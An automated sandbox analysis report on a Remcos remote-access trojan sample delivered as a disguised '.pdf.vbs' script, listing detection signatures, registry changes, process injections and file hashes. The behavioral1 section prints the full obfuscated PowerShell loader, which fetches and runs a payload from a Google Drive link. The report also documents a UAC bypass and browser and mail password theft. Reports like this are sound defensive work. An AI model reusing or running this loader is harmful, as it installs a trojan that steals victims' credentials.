Malware Analysis Report

2024-12-01 03:06

Sample ID 241111-h4dhssvgnm
Target 11112024_0717_SIGN_23930581750_pdf.vbs.zip
SHA256 36a7e6bbc96ddaab87a05c6e77c75962ae930e631458abba7b6c03e4683a311d
Tags
execution remcos remotehost collection credential_access discovery evasion rat stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

36a7e6bbc96ddaab87a05c6e77c75962ae930e631458abba7b6c03e4683a311d

Threat Level: Known bad

The file 11112024_0717_SIGN_23930581750_pdf.vbs.zip was found to be: Known bad.

Malicious Activity Summary

execution remcos remotehost collection credential_access discovery evasion rat stealer trojan

UAC bypass

Remcos

Remcos family

Detected Nirsoft tools

NirSoft WebBrowserPassView

NirSoft MailPassView

Uses browser remote debugging

Blocklisted process makes network request

Checks computer location settings

Accesses Microsoft Outlook accounts

Legitimate hosting services abused for malware hosting/C2

Command and Scripting Interpreter: PowerShell

Suspicious use of SetThreadContext

Drops file in System32 directory

Suspicious use of NtSetInformationThreadHideFromDebugger

Suspicious use of NtCreateThreadExHideFromDebugger

System Location Discovery: System Language Discovery

Enumerates physical storage devices

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Suspicious use of FindShellTrayWindow

Enumerates system info in registry

Suspicious behavior: EnumeratesProcesses

Suspicious behavior: MapViewOfSection

Suspicious use of WriteProcessMemory

Modifies registry class

Suspicious use of AdjustPrivilegeToken

Modifies registry key

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-11 07:17

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-11 07:17

Reported

2024-11-11 07:22

Platform

win7-20241023-en

Max time kernel

121s

Max time network

121s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\SIGN_23930581750·pdf.vbs"

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WScript.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\SIGN_23930581750·pdf.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Haplophase Brandmnds Bagatellishcr Taagers #><#Medaljetagers Mizrah raptusser Wapiti Interpellerede Selvjustitsens #>$truckings='Supinity';function Galliumoxidernes($Bortrive){If ($host.DebuggerEnabled) {$Ringkbingerens++;$Rollefag=$Bortrive.'Length' - $Ringkbingerens} for ( $Overskrider123=4;$Overskrider123 -lt $Rollefag;$Overskrider123+=5){$Entitledness86=$Overskrider123;$Imponed+=$Bortrive[$Overskrider123]}$Imponed}function Midtpunktsgendes($Shippingmnd0){ .($Matzas) ($Shippingmnd0)}$Laborhood=Galliumoxidernes ' Bi NRestEPa dTCont.Bon wHomeES umb.arccLiteLMakrI PteES pen acitspi ';$Tait=Galliumoxidernes 'AfblMAjleoEksazF lki SkalD.gtl etha Sta/Over ';$ectoenzym=Galliumoxidernes 'S heTIodol rinsAura1Cata2S.gf ';$Stens=' Ce [Taa.N ieE skit Av..Ano SbriseHo orStjkVNonii OseC .enEA enPEle,OStuli CinnDukkTbranMDrafAEpicnBlikA Demg ProEBan,r udv] Sur:nd a:NewssOphiE.layC R muMed r ReaI In T Udsy SetPToxor ilOCal T fruOSideC.ehaOOverlEl v=Pare$WorlEPas CRabbtEnvoOheeleOplanCutwzLeukyPostM Jen ';$Tait+=Galliumoxidernes 'Gr,s5Bomb.tn,e0 Pit rem (g deWAk ii alin Pr d To oInmew A tsPa a irreNUnidTJern C,em1Eury0Salv.Baar0Dist; gra GennWFueliNi snReor6Anti4 ma ;Coun Ku.sxSn,k6Ammo4Mout;S ri ri erKontvSv n: Dep1Bdel3th r1 Uri.,lev0Co i)Ekso N,nmGT eaeS udc boxkFedtoD,te/ L e2Aero0Sejr1Bill0 C,n0Coag1 Hed0Acco1Iodi GlaFLyesi Sver GroeWeatf ProoSkrixCamo/D,ms1 Bul3Ann 1Rib .Skol0,ett ';$hundyrene=Galliumoxidernes 'ForkUtapss .tueSittR yal-DafnaEnerGPl.mEc abnP.toTEner ';$Amorists=Galliumoxidernes 'L.neh SnitplantD cipElvesMo c: Hje/Re u/Di edUnc rStruiFortv St,eRamp.ToadgForuoAutoo UdggSor lAntleRe e.ButccS igo StemRens/ ,pruPr,scSemi? uleUndexMe epA reo IndrObsttAn,i=SupedDeleo Wa w igensprilSvi oBrneaNethd ndf&MahoiCowrdF.tt= Par1 lliH illUIn.ioGelaqfdev1ProcEBaadWAv nh afltBlitpSy tFSubbMMbletLagoQ Ju 4 U,eSLifl4 G lvShawWTornCO hn1 KonFTrfly ydGGelis vigkInva_.lkaLStumFA ti2 .ee5.rgajIn s ';$Motorcykelen=Galliumoxidernes 'Anth>Libr ';$Matzas=Galliumoxidernes 'PermISygee orxLikv ';$Vireo='Grevekrone';$Princippets67='\Khets.Ser';Midtpunktsgendes (Galliumoxidernes 'Form$OverGS bclAurio.ikpBKiloAdagfLUno :SammRShipAAvelG eu,g Bire MulnF,te=Benz$PublE EksnAf aV Han:BesiATurnPSynkp DiaDOv,raBesktFor.aMund+Elwi$ MajPForeRf reiSawyNHellCHon Iove PSomnPKorrE ilftHighSBio.6Appe7Unin ');Midtpunktsgendes (Galliumoxidernes 'Over$Paulg nrelbarboTvanb ja,ABackL M j:,pertRefrYHallVBorgS.remTPodajLobbA nfAappoL ynkECountda.k=Hal,$S.tuASta.M MaaoFl er oseIHemosCancT .ncsOver.RekosDownpG.ldLShetICateT Pro( Res$ad im Di,o EttT andOPhlerLedicPe syRygskS ksemicrLUnprEBettnC ro)atom ');Midtpunktsgendes (Galliumoxidernes $Stens);$Amorists=$Tyvstjaalet[0];$Antorbital69=(Galliumoxidernes 'R ef$ SvrgRooflbestoOmniBSpurA aulForb:ProvBSpiloKineLRen s MurhInitE AhavK mpiDespKtohni ,hoaCh fn Clo=disaNGraseFolkw esi-EnigoTrkkBMutaJMil e ShacTakttrakk Quins AnmyUnshsDuckTM,lle IncmLige.Etho$ fbaLJe rAEcbaBPaleOToter BlohThroo .onO ,ohDMest ');Midtpunktsgendes ($Antorbital69);Midtpunktsgendes (Galliumoxidernes 'Irid$StalBreboo ierlSelvsByplhDelee AfvvRestiMic,k PoliTanda A enT gl.VideHMalkeSanda BaddMo eeUtoprHa,ms ap[Naah$SilvhInteuTermnV jrd iasy Cror rbe La n DeleSuc,]Totu=E.ma$GletT Su aFa ti .hetBygh ');$sportsbegivenheden=Galliumoxidernes ' ni.$ FliBGulpoDi ilV tsscop hTrveeKomiv AfhiInflkHarmiRefra egn.ove.Dis DBundoDebawDecenStyllFireo InfaI,mjdKajaFSup.iFin l abeAnti(Appl$udsaAPhi.mCalvoDisirUnapiScarsTilbt OvesFung,Brun$KamiDThyre,eettCosmaStyrcK,nkhAlmieCondmForreAmobnove tAn beb,smr LocnUnsue Dir)Ab.a ';$Detachementerne=$Raggen;Midtpunktsgendes (Galliumoxidernes 'Chee$ rosg Dokl.karoJettBXy oaGipslElef:M krBAchyaOptis orsI HanN ApaF veruWiriL Bes= .ub(D,ggTRet eTireSHypeTUncr-TiggpfayaaUnmetSu ehSeri Nu,e$StudDultrERe iTfe ka IriCKronH UdfeCarrm krbERa,eNG.let CytE ModRAfstnLympEBet,)Hu d ');while (!$basinful) {Midtpunktsgendes (Galliumoxidernes 'Pas,$ungug PaalAfs.o Neobc,rra SpalUdes:Tap UOkk,nLar p ShouSpejm ljdpRes a S abSupel Op ePyr =Ultr$,rvetTuskr Z nu Un e nds ') ;Midtpunktsgendes $sportsbegivenheden;Midtpunktsgendes (Galliumoxidernes 'Mo is Dd,tSeroaSygerOvisTInda-NudiSCatslHymne InfeforepRekr Samm4Idee ');Midtpunktsgendes (Galliumoxidernes 'Frst$ ecoGOpkoLPiluOStomBMispaClarLDiff:ProsBuddya xplS indI HavnUn eFUd iuSynbl Fle=.nas(occuT LedEsp rSAf bTKvin-Pantp ManAStbetErn H ugt Vesi$AssidNatue ekt SlyA UndC VithBehaE SemMDagsE P,eNMellTtab EViklRFe sNO.seeMism)C.oi ') ;Midtpunktsgendes (Galliumoxidernes 'Scha$ SugGA pilDagsOHedgbAboraSk lLInel: vrebG,teOJohal LabdBir bEmbra ilnNJaroeKrafRNoni=In c$Tr sG riplBandoTredBScruAStoplBe r: Leug,aftrDil aS.kbVDec HH ppuEdwanUtild Ba eSnoonCoinE brdsIndl+Comp+Knsd%Pneu$Extrt ilaYse ev RstsSkivTSmutj MonaS.anA.addlUha E ForTS gn. Magc andOSeveUHierN nyoTMuck ') ;$Amorists=$Tyvstjaalet[$Boldbaner]}$Dinornithiformes=335350;$Udskrivninger=30943;Midtpunktsgendes (Galliumoxidernes 'Bari$CalcgAnkrl OpfoAfpaBRamma To.lIn t: PloMForhI.iptnMeriDmarys WomT TekEEqu,LGougNDkfaSFryt Fjer=Kode UopsGBam E .ngtGeor- DevCMaaloBerbN ilktStifEOffrN Bint Arc Unif$ThawdPrefER tutEli,A MotcKkkeh MilERecimkrabE razNGlantPatrEElfor Blonaduse ele ');Midtpunktsgendes (Galliumoxidernes 'Maan$ .reg raul M soFanabbarlaanthl mai: ReaBPahoyHensrAminoHeadn emiWeapsAntit Mu 1lgpl8Fina Ek p=Bass Slaf[nowtSFanty Consp ratLeroe Form Fr .Dro COrdnoSammnDi.avPredeGh srMasst ubp]Dity:Form:ProkFL.evrPocho.fskmSp jBK elaGunysRet eHjae6d ke4Lep SperrtFre.rBe.uiVelsnCo tgMala( ini$Squ.MRecoiuvicnSu gdE itsForotpre ePopkl NonnCra sIne,) Ba, ');Midtpunktsgendes (Galliumoxidernes 'Smre$ HemGwanhLFagjoSystbSl.maStablAl y:Bge RKri I FritDisjeBrnelGr pyDepo1N nm4Si,k3Sava Angs=En g Kons[BlomSFlouYSi.uS pret alaESaufm An,.P lsTFurnE icxf ekT ogr.Rov E laaN G ucSkavoKi kd erpi UninCorvGMagn]Beto: Lis:HeteaefteSBrydcSammiEgn iSeks.ForeGUdvie MarTD.meSB llt,nderuninI GstNSkjogKre (Uret$Warkb S,pYDestrTranORappnFeldI Fa S M.ntMono1Glan8 iek)Plas ');Midtpunktsgendes (Galliumoxidernes '.nko$PortgBefrLKloroGad,bPa raattaLZon,:FariA astU Ef tOptae NonnTryktDumaiUskoFAl nIWr tcEn eeDemorRagiEChe,n pr,D ntieOffesTors1 sut0kro 3 pi=Udlo$ fgirFu mICenttaarseT rrL elyHjor1Upcr4 Fyr3K nt.UdmesUds.u D,rB SniSHektt AgtrBackiRefoN BefgDung( Skf$ForedO,erIEspinHvelOHe.erS,renTelei Ud tlimnHHalsi objfKinooFrstRHazaMWaddeC roSDepa,Brsm$ Wo uSovsDSpe.SWitekNstmr naikalfvD chNPlanIscannPhalG Fage ndeR,ont) teg ');Midtpunktsgendes $Autentificerendes103;"

Network

Files

C:\Users\Admin\AppData\Local\Temp\CabBBC3.tmp

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

memory/1964-20-0x000007FEF55AE000-0x000007FEF55AF000-memory.dmp

memory/1964-21-0x000000001B5A0000-0x000000001B882000-memory.dmp

memory/1964-25-0x000007FEF52F0000-0x000007FEF5C8D000-memory.dmp

memory/1964-26-0x000007FEF52F0000-0x000007FEF5C8D000-memory.dmp

memory/1964-24-0x000007FEF52F0000-0x000007FEF5C8D000-memory.dmp

memory/1964-23-0x0000000002690000-0x0000000002698000-memory.dmp

memory/1964-22-0x000007FEF52F0000-0x000007FEF5C8D000-memory.dmp

memory/1964-27-0x000007FEF52F0000-0x000007FEF5C8D000-memory.dmp

memory/1964-28-0x000007FEF52F0000-0x000007FEF5C8D000-memory.dmp

memory/1964-29-0x000007FEF55AE000-0x000007FEF55AF000-memory.dmp

memory/1964-30-0x000007FEF52F0000-0x000007FEF5C8D000-memory.dmp

memory/1964-31-0x000007FEF52F0000-0x000007FEF5C8D000-memory.dmp

memory/1964-32-0x000007FEF52F0000-0x000007FEF5C8D000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-11 07:17

Reported

2024-11-11 07:22

Platform

win10v2004-20241007-en

Max time kernel

169s

Max time network

188s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\SIGN_23930581750·pdf.vbs"

Signatures

Remcos

rat remcos

Remcos family

remcos

UAC bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A

Detected Nirsoft tools

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

NirSoft MailPassView

Description Indicator Process Target
N/A N/A N/A N/A

NirSoft WebBrowserPassView

Description Indicator Process Target
N/A N/A N/A N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WScript.exe N/A

Accesses Microsoft Outlook accounts

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts C:\Windows\SysWOW64\msiexec.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe N/A

Suspicious use of NtCreateThreadExHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 432 set thread context of 3328 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 432 set thread context of 4528 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 432 set thread context of 1520 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\msiexec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\msiexec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\msiexec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WScript.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\msiexec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings C:\Windows\SysWOW64\msiexec.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\reg.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4452 wrote to memory of 4004 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4452 wrote to memory of 4004 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1708 wrote to memory of 432 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\msiexec.exe
PID 1708 wrote to memory of 432 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\msiexec.exe
PID 1708 wrote to memory of 432 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\msiexec.exe
PID 1708 wrote to memory of 432 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\msiexec.exe
PID 432 wrote to memory of 4452 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\cmd.exe
PID 432 wrote to memory of 4452 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\cmd.exe
PID 432 wrote to memory of 4452 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\cmd.exe
PID 4452 wrote to memory of 2304 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 4452 wrote to memory of 2304 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 4452 wrote to memory of 2304 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 432 wrote to memory of 2728 N/A C:\Windows\SysWOW64\msiexec.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 432 wrote to memory of 2728 N/A C:\Windows\SysWOW64\msiexec.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2728 wrote to memory of 344 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2728 wrote to memory of 344 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 432 wrote to memory of 4072 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 432 wrote to memory of 4072 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 432 wrote to memory of 4072 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 432 wrote to memory of 2024 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 432 wrote to memory of 2024 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 432 wrote to memory of 2024 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 432 wrote to memory of 3328 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 432 wrote to memory of 3328 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 432 wrote to memory of 3328 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 432 wrote to memory of 3328 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 432 wrote to memory of 4528 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 432 wrote to memory of 4528 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 432 wrote to memory of 4528 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 432 wrote to memory of 4528 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 432 wrote to memory of 1520 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 432 wrote to memory of 1520 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 432 wrote to memory of 1520 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 432 wrote to memory of 1520 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 2728 wrote to memory of 2892 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2728 wrote to memory of 2892 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2728 wrote to memory of 2892 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2728 wrote to memory of 2892 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2728 wrote to memory of 2892 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2728 wrote to memory of 2892 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2728 wrote to memory of 2892 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2728 wrote to memory of 2892 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
